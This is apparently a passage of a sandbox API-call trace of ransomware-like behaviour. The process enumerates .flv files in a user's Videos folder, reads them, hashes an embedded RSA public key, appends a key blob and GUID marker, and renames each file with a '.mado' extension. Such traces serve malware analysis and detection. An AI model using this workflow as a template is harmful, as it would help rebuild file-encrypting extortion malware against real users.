ftLastWriteTime.dwLowDateTime=0xb09ca9b0, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.145] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72915f00, ftCreationTime.dwHighDateTime=0x1d5df13, ftLastAccessTime.dwLowDateTime=0x48280570, ftLastAccessTime.dwHighDateTime=0x1d5e814, ftLastWriteTime.dwLowDateTime=0x48280570, ftLastWriteTime.dwHighDateTime=0x1d5e814, nFileSizeHigh=0x0, nFileSizeLow=0x9be3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9cgP.flv", cAlternateFileName="")) returned 1 [0206.145] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\9cgP.flv") returned=".flv" [0206.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\9cgP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\9cgp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.146] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=39907) returned 1 [0206.146] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.149] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x9bbd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.149] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.151] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x9be3, lpOverlapped=0x0) returned 1 [0206.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.152] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.153] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.153] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.153] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.153] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.153] GetLastError () returned 0x0 [0206.153] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.153] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.153] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.153] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.153] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.153] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.154] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x9be3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.154] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.154] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.154] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.154] CloseHandle (hObject=0x63c) returned 1 [0206.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0206.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.156] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\9cgP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\9cgp.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\9cgP.flv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\9cgp.flv.mado")) returned 1 [0206.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.157] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.158] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf71a9780, ftCreationTime.dwHighDateTime=0x1d5dca4, ftLastAccessTime.dwLowDateTime=0x5a305e60, ftLastAccessTime.dwHighDateTime=0x1d5db9f, ftLastWriteTime.dwLowDateTime=0x5a305e60, ftLastWriteTime.dwHighDateTime=0x1d5db9f, nFileSizeHigh=0x0, nFileSizeLow=0x43b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IOfrA6qSZ60.flv", cAlternateFileName="IOFRA6~1.FLV")) returned 1 [0206.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0206.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.158] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\IOfrA6qSZ60.flv") returned=".flv" [0206.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\IOfrA6qSZ60.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\iofra6qsz60.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.159] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=17332) returned 1 [0206.159] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.162] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x438e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.162] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.164] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.164] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x43b4, lpOverlapped=0x0) returned 1 [0206.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.165] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.166] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.166] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.166] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.166] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.166] GetLastError () returned 0x0 [0206.166] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.166] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.166] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.166] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.166] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x43b0) returned 0x3b81690 [0206.167] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66ed0 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66f18 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.167] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79ab8 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79aa0 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72b80 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72c98 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.169] GetCurrentThreadId () returned 0x600 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff628 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.169] GetCurrentThreadId () returned 0x600 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0206.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b00 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 